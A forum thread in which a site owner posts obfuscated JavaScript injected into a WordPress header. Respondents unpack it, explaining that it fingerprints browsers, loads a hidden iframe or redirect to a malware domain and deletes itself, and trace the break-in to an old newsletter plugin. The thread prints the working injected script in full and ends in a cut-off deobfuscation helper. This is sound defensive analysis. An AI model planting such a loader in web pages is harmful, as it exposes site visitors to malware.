
Suspicious JavaScript in website header

I don't know whether this is the right place to ask questions like this; apologies if it isn't.

I found the code below in the header of one of my WordPress websites. I'm fairly sure it is malicious and I have removed it. However, I'm curious and I can't work out what its purpose is.

Is anyone able to provide any insight?

Base64 encoded:


Actual code:

<script type="text/javascript" id="id_8807906">
    eval(function(p, a, c, k, e, d) {
        e = function(c) {
            return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
        };
        if (!''.replace(/^/, String)) {
            while (c--) {
                d[e(c)] = k[c] || e(c)
            }
            k = [function(e) {
                return d[e]
            }];
            e = function() {
                return '\\w+'
            };
            c = 1
        };
        while (c--) {
            if (k[c]) {
                p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c])
            }
        }
        return p
    }('q 1t=3x(J(){f(j.M!=1I&&L j.M!="K"){3y(1t);f(L A["1A"]=="K"){A["1A"]=1;q 17=(16()&&1R());q 1T=!17&&!!A.3z&&A.E.3w==="3v 3r.";q 1j=-1;q G="3s://3t.3u/3A";f(W()&&1j==1){f((E.N.1o(/3B/i))||(E.N.1o(/3H/i))){19.3I(G)}z{A.19=G;j.19=G}}z{f((17&&!1T&&!W())){q S="<11 3J=\\"3G:3F;3C:-3D;\\"><1y 3E=\\"1l\\" 3q=\\""+G+"\\" 3p=\\"1l\\"></1y></11>";q I=j.3b("11");f(I.1m==0){j.M.P=j.M.P+S}z{q 1N=I.1m;q R=3c.3d((1N/2));I[R].P=I[R].P+S}}}}1M()}},3a);J 1M(){q U="39";f(U!="35"){q H=j.36(U);f(L H!=K&&H!=1I){H.37="";38 H}}};J 1R(){f(j.D&&!j.3e){x B}z f(j.D&&!A.3f){x B}z f(j.D&&!j.3m){x B}z f(j.D&&!j.3n){x B}z f(j.D&&!A.3o){x B}z f(j.D){x B}z f(L E.3l!="K"&&!j.D&&16()){x B}z{x 1b}}J 16(){q y=A.E.N;q Q=y.C("3k ");f(Q>0){x Z(y.Y(Q+5,y.C(".",Q)),10)}q 1k=y.C("3g/");f(1k>0){q 14=y.C("3h:");x Z(y.Y(14+3,y.C(".",14)),10)}q O=y.C("3i/");f(O>0){x Z(y.Y(O+5,y.C(".",O)),10)}x 1b}J W(){q 1a=A.E.N.3j();f(/(3K|3L\\d+|4h).+1h|4i|4j\\/|4g|4f|4b|4c|4d|34|4k|1u(4l|1d)|1r|4r|4s |4t|4q|4p|1h.+4m|4n|4o m(4a|48)i|3S( 1O)?|3T|p(3U|3R)\\/|3Q|3M|3N|3O(4|6)0|3P|3V|1H\\.(3W|43)|44|46|42 41|3X|3Y/i.1C(1a)||/3Z|4u|2K|2f|2a|50[1-6]i|28|1V|a 1P|1X|1w(1Q|1x|s\\-)|1S(2b|2k)|1g(2m|1n|1v)|2n|2d(2e|V|2c)|2i|1f(2l|1c)|1Z(T|2o)|1W|1Y(2p|\\-m|r |s )|2q|2g(1U|1p|2h)|1B(2j|22)|23(1w|29)|27(e|v)w|26|24\\-(n|u)|25\\/|33|2Q|2R\\-|2P|2O|2L|2M\\-|1v(2N|1E)|2Z|2V(1e|1p|2X)|2x|2y\\-s|2z|2w|2v|1i(c|p)o|2s(12|\\-d)|2u(49|1S)|2B(2H|2I)|1Q(2D|2E)|2C|2F([4-7]0|1O|1P|2G)|2A|2t(\\-|1q)|1L u|2J|2W|2Y\\-5|g\\-15|1c(\\.w|1d)|31(30|2U)|2r|2T|2S\\-(m|p|t)|4e\\-|4D(1G|1F)|6m( i|1u)|6n\\-c|6o(c(\\-| |1q|a|g|p|s|t)|6k)|6h(6i|6j)|i\\-(20|1c|X)|6q|4v( |\\-|\\/)|6w|6x|6y|6v|6u|6r|6s|1r|6t(t|v)a|6g|6f|62|63|64|5Z( |\\/)|5U|5V |5W\\-|5X(c|k)|65(66|6c)|6d( g|\\/(k|l|u)|50|54|\\-[a-w])|68|69|6z\\-w|72|73\\/|X(T|74|71)|1z(F|21|1n)|m\\-6Z|6W(6X|1D)|75(76|7c|1J)|7e|15(F|7d|1B|7b|1i|t(\\-| |o|v)|77)|78(50|6U|v 
)|6T|6G|6H[0-2]|6I[2-3]|6F(0|2)|6E(0|2|5)|6B(0(0|1)|10)|6C((c|m)\\-|6D|6J|6K|6Q|6R)|6S(6|i)|6O|6L|6M(6N|5T)|5S|4W|4X|4Y(a|d|t)|4U|4R(13|\\-([1-8]|c))|4Z|51|1K(5a|5b)|5c\\-2|59(1U|58|1s)|55|56|1G\\-g|57\\-a|4P(4C|12|21|32|60|\\-[2-7]|i\\-)|4x|4y|4z|4F|4G|4M(4N|4O)|4L\\/|4K(4H|X|4I|4J|V|5d)|5e(F|h\\-|1x|p\\-)|5G\\/|1s(c(\\-|0|1)|47|1z|1E|1D)|5A\\-|5B|5C(\\-|m)|5I\\-0|5J(45|5Q)|5R(1g|1f|5O|1e|5N)|5K(5L|V)|5M(F|h\\-|v\\-|v )|5y(F|5l)|5m(18|50)|5n(5k|10|18)|1F(5g|5h)|5i\\-|5o\\-|5p(i|m)|5v\\-|t\\-15|5x(1K|5u)|1J(70|m\\-|5q|5r)|5s\\-9|1H(\\.b|1L|5z)|5P|5D|5E|4V|6e(6p|T)|6l(40|5[0-3]|\\-v)|5t|5w|5f|5j(52|53|60|61|70|5H|5F|4w|4A|4B)|4E(\\-| )|4Q|4T|4S(g |6P|79)|7a|6Y|6V|6A\\-|67|6a|6b\\-/i.1C(1a.5Y(0,4))){x B}x 1b}', 62, 449, '|||||||||||||||if||||document|||||||var|||||||return|zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY|else|window|true|indexOf|all|navigator|01|XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl|ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD|lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc|function|undefined|typeof|body|userAgent|REVLGqfpuneuaaJEXHSGpWnQjZaZVSkF|innerHTML|TAbiLSYVvuNwIiiXwiIQnfLCxaBCrsouSxrSuH|mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy|DesUquKQJgBZjosSHPWcRVgzymaWwrEImVixoHt|te|vgZvyjCdzDWwBudHEktBnaagYYYbnZxB|ny|LCHqSJXhIyudrWzobJDSCoYggFqaOJuRicOo|ma|substring|parseInt||div|||AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA|mo|JqFOWeGJVjglgXJgbmWMOOgrzOjmywAyo|CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym||location|pKJQtNwdoBZJNpjycIXWoUpkeifUIrZlE|false|go|od|it|ar|al|mobile|do|ZLuhoXzddcRRJFsZItJJdsiHYGGoAUT|fvqjbsMLZwQhjFmZywfJpPJBvaYNNPAbkM|21px|length|ca|match|ll|_|iris|se|jxPogLroeXQvpXkmguljZoGSNnIQKQUt|ip|co|ac|oo|iframe|mc|v_bd66b32e1bc6ad91e01318e8278918f0|bi|test|ri|nd|ta|pt|up|null|ts|pl|g1|pIooJuskHsSJnnXgfiVEvsFqqcqXQQjo|dl_name|os|wa|er|iQDjSrUavDhsaZpAGAdpuicNIitAQcswtAX|ai|nfxiKffyQjEHIifZBNIfZPyvuVAKXQAWejKxfkfeh|ck|802s|attw|abac|au|as|||rd|bl|bw|c55|bumb|br|770s|az|4thp|ko|yw|an|ex|3gso|be|nq|aptu|lb|rn|ch|av|amoi|us|di|avan|haie|ds|fly|el|dmob|dica|dbte|dc|devi|fetc|em|esl8|ic|k0|ez|ze|l2
|ul|g560|6590|cldc|cmd|mp|chtm|cell|ccwa|cdm|hd|hcit|un|da|gene|ng|gf|craw|ad|gr||capi|hiptop|none|getElementById|outerHTML|delete|id_8807906|100|getElementsByTagName|Math|floor|compatMode|XMLHttpRequest|Trident|rv|Edge|toLowerCase|MSIE|maxTouchPoints|querySelector|addEventListener|atob|height|src|Inc|http|miwkavoriwka|ml|Google|vendor|setInterval|clearInterval|chrome|052F|iPhone|left|2630px|width|absolute|position|iPod|replace|style|Android|bb|pocket|psp|series|symbian|plucker|re|Palm|phone|ixi|treo|browser|xda|xiino|1207||ce|windows|link|vodafone||wap||in||ob|compal|elaine|fennec|hei|blazer|blackberry|meego|avantgo|bada|iemobile|hone|firefox|netfront|opera|mmp|midp|Kindle|lge|maemo|6310|iac|83|qtek|r380|r600|85|98|07|hi|w3c|raks|rim9|ge|mm|ms|sa|s55|ro|ve|zo|qc|webc|pg|wi|whit|pdxg|veri|owg1|p800|pan|phil||pire||||prox|psio|qa|rt|po|ay|uc|pn|va|sc|vulc|gt|lk|tcl|vx|00|mb|t2|t6|tdg|tel|m3|m5|tx|vm40|sh|tim|voda|to|sy|si|sgh|shar|sie|v400|v750|81|sdk|80|sk|sl|so|ft|sp|t5|b3|utst|id|sm|oran|wv|klon|kpt|kwc|kyo|substr|kgt|||jigs|kddi|keji|le|no|your|libw|lynx|zeto|zte|xi|lg|vi|jemu|jbro|hu|aw|tc|tp|vk|hp|hs|ht|rg|i230|inno|ipaq|ja|im1k|ikom|ibro|idea|ig01|m1|yas|n7|ne|on|n50|n30|mywa|n10|n20|tf|wf|o2im|op|ti|nzph|nc|wg|wt|nok|mwbp|p1|x700|me|rc|wonu|cr||xo|m3ga|m50|ui|mi|o8|zz|mt|nw|wmlb|de|oa|02|mmef'.split('|'), 0, {}))
22
bf2mad

It looks like the "actual code" you posted is packed using http://matthewfl.com/unPacker.html . When you unpack it, you get

var jxPogLroeXQvpXkmguljZoGSNnIQKQUt=setInterval(function()
{
if(document.body!=null&&typeof document.body!="undefined")
    {
    clearInterval(jxPogLroeXQvpXkmguljZoGSNnIQKQUt);
    if(typeof window["v_bd66b32e1bc6ad91e01318e8278918f0"]=="undefined")
        {
        window["v_bd66b32e1bc6ad91e01318e8278918f0"]=1;
        var CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym=(JqFOWeGJVjglgXJgbmWMOOgrzOjmywAyo()&&iQDjSrUavDhsaZpAGAdpuicNIitAQcswtAX());
        var nfxiKffyQjEHIifZBNIfZPyvuVAKXQAWejKxfkfeh=!CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym&&!!window.chrome&&window.navigator.vendor==="Google Inc.";
        var ZLuhoXzddcRRJFsZItJJdsiHYGGoAUT=-1;
        var XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl="http://miwkavoriwka.ml/052F";
        if(LCHqSJXhIyudrWzobJDSCoYggFqaOJuRicOo()&&ZLuhoXzddcRRJFsZItJJdsiHYGGoAUT==1)
            {
            if((navigator.userAgent.match(/iPhone/i))||(navigator.userAgent.match(/iPod/i)))
                {
                location.replace(XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl)
            }
            else
                {
                window.location=XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl;
                document.location=XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl
            }
        }
        else
            {
                if((CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym&&!nfxiKffyQjEHIifZBNIfZPyvuVAKXQAWejKxfkfeh&&!LCHqSJXhIyudrWzobJDSCoYggFqaOJuRicOo()))
                    {
                    var DesUquKQJgBZjosSHPWcRVgzymaWwrEImVixoHt="<div style=\"position:absolute;left:-2630px;\"><iframe width=\"21px\" src=\""+XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl+"\" height=\"21px\"></iframe></div>";
                    var lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc=document.getElementsByTagName("div");
                    if(lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc.length==0)
                        {
                        document.body.innerHTML=document.body.innerHTML+DesUquKQJgBZjosSHPWcRVgzymaWwrEImVixoHt
                    }
                    else
                        {
                        var dl_name=lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc.length;
                        var mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy=Math.floor((dl_name/2));
                        lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc[mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy].innerHTML=lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc[mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy].innerHTML+DesUquKQJgBZjosSHPWcRVgzymaWwrEImVixoHt
                    }
                }
            }
        }
        pIooJuskHsSJnnXgfiVEvsFqqcqXQQjo()
    }
}
,100);
function pIooJuskHsSJnnXgfiVEvsFqqcqXQQjo()
    {
    var vgZvyjCdzDWwBudHEktBnaagYYYbnZxB="id_8807906";
    if(vgZvyjCdzDWwBudHEktBnaagYYYbnZxB!="none")
        {
        var ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD=document.getElementById(vgZvyjCdzDWwBudHEktBnaagYYYbnZxB);
        if(typeof ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD!=undefined&&ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD!=null)
            {
            ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD.outerHTML="";
            delete ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD
        }
    }
};
function iQDjSrUavDhsaZpAGAdpuicNIitAQcswtAX()
    {
    if(document.all&&!document.compatMode)
        {
        return true
    }
    else if(document.all&&!window.XMLHttpRequest)
        {
        return true
    }
    else if(document.all&&!document.querySelector)
        {
        return true
    }
    else if(document.all&&!document.addEventListener)
        {
        return true
    }
    else if(document.all&&!window.atob)
        {
        return true
    }
    else if(document.all)
        {
        return true
    }
    else if(typeof navigator.maxTouchPoints!="undefined"&&!document.all&&JqFOWeGJVjglgXJgbmWMOOgrzOjmywAyo())
        {
        return true
    }
    else
        {
        return false
    }
}
function JqFOWeGJVjglgXJgbmWMOOgrzOjmywAyo()
    {
    var zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY=window.navigator.userAgent;
    var TAbiLSYVvuNwIiiXwiIQnfLCxaBCrsouSxrSuH=zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf("MSIE ");
    if(TAbiLSYVvuNwIiiXwiIQnfLCxaBCrsouSxrSuH>0)
        {
        return parseInt(zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.substring(TAbiLSYVvuNwIiiXwiIQnfLCxaBCrsouSxrSuH+5,zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf(".",TAbiLSYVvuNwIiiXwiIQnfLCxaBCrsouSxrSuH)),10)
    }
    var fvqjbsMLZwQhjFmZywfJpPJBvaYNNPAbkM=zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf("Trident/");
    if(fvqjbsMLZwQhjFmZywfJpPJBvaYNNPAbkM>0)
        {
        var AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA=zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf("rv:");
        return parseInt(zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.substring(AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA+3,zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf(".",AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA)),10)
    }
    var REVLGqfpuneuaaJEXHSGpWnQjZaZVSkF=zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf("Edge/");
    if(REVLGqfpuneuaaJEXHSGpWnQjZaZVSkF>0)
        {
        return parseInt(zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.substring(REVLGqfpuneuaaJEXHSGpWnQjZaZVSkF+5,zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf(".",REVLGqfpuneuaaJEXHSGpWnQjZaZVSkF)),10)
    }
    return false
}
function LCHqSJXhIyudrWzobJDSCoYggFqaOJuRicOo()
    {
    var pKJQtNwdoBZJNpjycIXWoUpkeifUIrZlE=window.navigator.userAgent.toLowerCase();
    if(/(Android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|Kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|Palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(pKJQtNwdoBZJNpjycIXWoUpkeifUIrZlE)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g 
|nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(pKJQtNwdoBZJNpjycIXWoUpkeifUIrZlE.substr(0,4)))
        {
        return true
    }
    return false
}

Which is still somewhat obfuscated through the use of "random" variable names. You can still see that the code tries to redirect you to:

hxxp://miwkavoriwka.ml/052F

Does anyone know what this site is for?

21
Gudradain

I unscrambled the code a bit:

var interval = setInterval(function() {
    if (document.body != null && typeof document.body != "undefined") {
        clearInterval(interval);
        // only do once per page load
        if (typeof window["v_bd66b32e1bc6ad91e01318e8278918f0"] == "undefined") {
            window["v_bd66b32e1bc6ad91e01318e8278918f0"] = 1;
            // mobile ?
            var CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym = (test_for_sepcific_user_agents() && some_capability_check());
            // Android ?
            var nfxiKffyQjEHIifZBNIfZPyvuVAKXQAWejKxfkfeh = !CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym && !!window.chrome && window.navigator.vendor === "Google Inc.";
            var ZLuhoXzddcRRJFsZItJJdsiHYGGoAUT = -1;
            var payload_addr = "http://miwkavoriwka.ml/052F";
            // This branch is never used because -1 != 1
            if (is_mobile_phone() && ZLuhoXzddcRRJFsZItJJdsiHYGGoAUT == 1) {
                if ((navigator.userAgent.match(/iPhone/i)) || (navigator.userAgent.match(/iPod/i))) {
                    location.replace(payload_addr)
                } else {
                    window.location = payload_addr;
                    document.location = payload_addr
                }
            } else {
                if ((CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym && !nfxiKffyQjEHIifZBNIfZPyvuVAKXQAWejKxfkfeh && !is_mobile_phone())) {
                    var frame_div = "<div style=\"position:absolute;left:-2630px;\"><iframe width=\"21px\" src=\"" + payload_addr + "\" height=\"21px\"></iframe></div>";
                    var divs = document.getElementsByTagName("div");
                    if (divs.length == 0) {
                        document.body.innerHTML = document.body.innerHTML + frame_div
                    } else {
                        var dl_name = divs.length;
                        // why ?
                        var mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy = Math.floor((dl_name / 2));
                        divs[mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy].innerHTML = divs[mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy].innerHTML + frame_div
                    }
                }
            }
        }
        remove_script()
    }
}, 100);

function remove_script() {
    // Remove the script (myself)
    var some_id = "id_8807906";
    if (some_id != "none") {
        var some_element = document.getElementById(some_id);
        if (typeof some_element != undefined && some_element != null) {
            some_element.outerHTML = "";
            delete some_element
        }
    }
};

// some capability check
// Possibly another mobile phone check?
function some_capability_check() {
    if (document.all && !document.compatMode) {
        return true
    } else if (document.all && !window.XMLHttpRequest) {
        return true
    } else if (document.all && !document.querySelector) {
        return true
    } else if (document.all && !document.addEventListener) {
        return true
    } else if (document.all && !window.atob) {
        return true
    } else if (document.all) {
        return true
    } else if (typeof navigator.maxTouchPoints != "undefined" && !document.all && test_for_sepcific_user_agents()) {
        return true
    } else {
        return false
    }
}

function test_for_sepcific_user_agents() {
    var user_agent = window.navigator.userAgent;
    var user_agent_msi_index = user_agent.indexOf("MSIE ");
    if (user_agent_msi_index > 0) {
        return parseInt(user_agent.substring(user_agent_msi_index + 5, user_agent.indexOf(".", user_agent_msi_index)), 10)
    }
    var user_agent_trident_index = user_agent.indexOf("Trident/");
    if (user_agent_trident_index > 0) {
        var AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA = user_agent.indexOf("rv:");
        return parseInt(user_agent.substring(AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA + 3, user_agent.indexOf(".", AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA)), 10)
    }
    var user_agent_Edge_index = user_agent.indexOf("Edge/");
    if (user_agent_Edge_index > 0) {
        return parseInt(user_agent.substring(user_agent_Edge_index + 5, user_agent.indexOf(".", user_agent_Edge_index)), 10)
    }
    return false
}

function is_mobile_phone() {
    var user_agent = window.navigator.userAgent.toLowerCase();
    if (/(Android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|Kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|Palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(user_agent) || /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(user_agent.substr(0, 4))) {
        return true
    }
    return false
}

It loads h**p://miwkavoriwka.ml/052F (which is already on some blacklists, including the FF phishing and malware protection list) in an iframe, or redirects to that URL (depending on your browser).

edit: After reading the code a bit: the only browsers that seem to be targeted are those where these conditions are met:

  • User agents containing MSIE , Trident/ or Edge/
  • Not a mobile phone? (see function is_mobile_phone )
  • Some capability checks are true (see function some_capability_check )
17
SleepProgger

Thanks for all the good information and help!

I have since found out how the site was originally hacked. The site was running an old version of the Mailpoet/wysija-newsletters plugin (pre 2.6.7).

Using an exploit in this plugin, the attacker managed to upload malicious code, which was then used to further infect the site.

https://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html

Ultimately, the security issue with Mailpoet/wysija-newsletters was used to upload a file called .Zip to /wp-content/uploads/wysija/temp, then extract the Zip and install dodgy themes. The attached screenshot shows what happened when accessing the plugins admin page after the Zip was removed. It seems that every time you enter wp-admin, the site gets reinfected.

The site has now been restored from a clean version, fully patched, and the WordFence plugin is running.


12
bf2mad

Its apparent goal is to infect wp-settings.php, so it infects all your pages and links to the malware via an iframe.

You can remove it by deleting wp_inc/upd.php, but that will only fix the threat vector if that hole is plugged. However, the "main infection" itself may be in a different file, if the comments are correct. Again, deleting this file won't help much if the threat vector is still there.

One person even suggested replacing eval with alert. Others have already unscrambled other versions using the techniques described in this thread. Your code follows a very similar pattern to this one.

6
Mark Buffalo
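
Added example, not part of the original thread: the unpacking step from the first answer and the "replace eval with alert" idea above can both be done without executing anything, by reading the four arguments of the packed call and applying the substitution the decoder would perform. The function names, the `summarize` triage report and the sample input (constructed, using the reserved `.example` domain) are assumptions made for this illustration.

```javascript
'use strict';

// Matches the argument list of a packed call: }('payload',radix,count,'w0|w1|...'.split('|')
const PACKER_CALL =
  /\}\s*\(\s*'((?:[^'\\]|\\.)*)'\s*,\s*(\d+)\s*,\s*(\d+)\s*,\s*'((?:[^'\\]|\\.)*)'\s*\.split\('\|'\)/s;

// Undo JavaScript string-literal escaping (\\ -> \, \' -> ', \n -> newline ...).
function unescapeLiteral(s) {
  const named = { n: '\n', r: '\r', t: '\t' };
  return s.replace(/\\([\s\S])/g, (_, ch) => named[ch] ?? ch);
}

// Same numbering scheme as the packer's e(c) helper: base `radix` (up to 62),
// digits 0-9, then a-z, then A-Z.
function encodeIndex(n, radix) {
  const head = n < radix ? '' : encodeIndex(Math.floor(n / radix), radix);
  const digit = n % radix;
  return head + (digit > 35 ? String.fromCharCode(digit + 29) : digit.toString(36));
}

// Rebuild the hidden source by substitution only; nothing is evaluated.
function unpack(payload, radix, count, words) {
  const dict = new Map();
  for (let i = 0; i < count; i++) {
    const token = encodeIndex(i, radix);
    dict.set(token, words[i] || token); // empty entry: the token stands for itself
  }
  return payload.replace(/\b\w+\b/g, (tok) => (dict.has(tok) ? dict.get(tok) : tok));
}

// Returns the unpacked source, or null when the text is not packer output.
function unpackScript(scriptText) {
  const m = PACKER_CALL.exec(scriptText);
  if (!m) return null;
  const words = unescapeLiteral(m[4]).split('|');
  return unpack(unescapeLiteral(m[1]), Number(m[2]), Number(m[3]), words);
}

// Triage summary of what the unpacked code does, with URLs defanged for reports.
function summarize(source) {
  const urls = [...new Set(source.match(/https?:\/\/[^\s"'\\<>]+/g) || [])];
  return {
    urls: urls.map((u) => u.replace(/^http/, 'hxxp')),
    injectsIframe: /<iframe\b/i.test(source),
    redirects: /\b(?:window|document)\.location\s*=|location\.replace\s*\(/.test(source),
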